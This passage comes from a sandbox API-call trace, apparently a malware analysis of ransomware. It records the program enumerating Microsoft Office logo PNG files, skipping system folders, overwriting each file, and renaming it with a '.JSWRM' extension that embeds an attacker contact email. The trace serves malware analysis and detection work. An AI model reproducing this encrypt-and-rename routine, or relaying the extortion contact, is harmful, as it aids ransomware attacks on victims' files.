lpNumberOfBytesRead=0x345e89c*=0x550, lpOverlapped=0x0) returned 1 [0132.634] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.634] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x550, lpOverlapped=0x0) returned 1 [0132.634] CloseHandle (hObject=0x238) returned 1 [0132.637] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.638] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1996e644, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1996e644, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x199947e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.contrast-white_scale-100.png", cAlternateFileName="FID3BA~1.PNG")) returned 1 [0132.638] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0132.639] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0132.639] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0132.639] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned -1 [0132.639] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0132.639] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0132.639] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0132.639] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.639] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0132.639] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned -1 [0132.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0132.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22ce70, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0132.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.640] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1546) returned 1 [0132.640] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.640] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x600, lpOverlapped=0x0) returned 1 [0132.642] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.642] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x600, lpOverlapped=0x0) returned 1 [0132.643] CloseHandle (hObject=0x238) returned 1 [0132.643] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.644] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1996e644, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1996e644, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x199947e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6c6, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.contrast-white_scale-140.png", cAlternateFileName="FI1689~1.PNG")) returned 1 [0132.644] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0132.644] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0132.644] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0132.644] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned -1 [0132.644] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0132.644] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0132.644] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0132.644] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.644] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0132.644] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned -1 [0132.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0132.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22ce70, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0132.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.645] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1734) returned 1 [0132.646] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.646] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x6c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x6c0, lpOverlapped=0x0) returned 1 [0132.650] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.650] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x6c0, lpOverlapped=0x0) returned 1 [0132.650] CloseHandle (hObject=0x238) returned 1 [0132.650] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.651] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1996e644, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1996e644, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x199947e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x84d, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.contrast-white_scale-180.png", cAlternateFileName="FIB7A7~1.PNG")) returned 1 [0132.651] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0132.651] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0132.651] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0132.651] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned -1 [0132.651] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0132.651] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0132.651] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0132.651] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.651] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0132.651] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned -1 [0132.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22ce70, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0132.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0132.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0132.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.652] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2125) returned 1 [0132.652] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.652] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x840, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x840, lpOverlapped=0x0) returned 1 [0132.654] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.654] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x840, lpOverlapped=0x0) returned 1 [0132.654] CloseHandle (hObject=0x238) returned 1 [0132.655] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.656] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1996e644, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1996e644, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x199947e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x561, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.contrast-white_scale-80.png", cAlternateFileName="FI5C4C~1.PNG")) returned 1 [0132.656] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0132.656] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0132.656] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0132.656] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned -1 [0132.656] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0132.656] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0132.656] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0132.656] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.656] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0132.656] lstrcmpiW (lpString1="FirstRunLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned -1 [0132.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0132.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0132.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0132.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.contrast-white_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0132.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.657] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1377) returned 1 [0132.657] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.657] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x560, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x560, lpOverlapped=0x0) returned 1 [0132.659] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.659] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x560, lpOverlapped=0x0) returned 1 [0132.659] CloseHandle (hObject=0x238) returned 1 [0132.659] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.660] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a723def, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a723def, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a723def, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5d8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogoSmall.scale-100.png", cAlternateFileName="FI2DF7~1.PNG")) returned 1 [0132.660] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-100.png", lpString2=".") returned 1 [0132.660] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-100.png", lpString2="..") returned 1 [0132.660] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-100.png", lpString2="...") returned 1 [0132.660] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-100.png", lpString2="windows") returned -1 [0132.660] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-100.png", lpString2="recovery") returned -1 [0132.660] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-100.png", lpString2="perflogs") returned -1 [0132.660] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0132.660] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.660] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-100.png", lpString2="system volume information") returned -1 [0132.660] lstrcmpiW (lpString1="FirstRunLogoSmall.scale-100.png", lpString2="msocache") returned -1 [0132.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0132.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x241178, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 31 [0132.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0132.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogoSmall.scale-100.png", cchWideChar=31, lpMultiByteStr=0x241100, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 31 [0132.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.661] 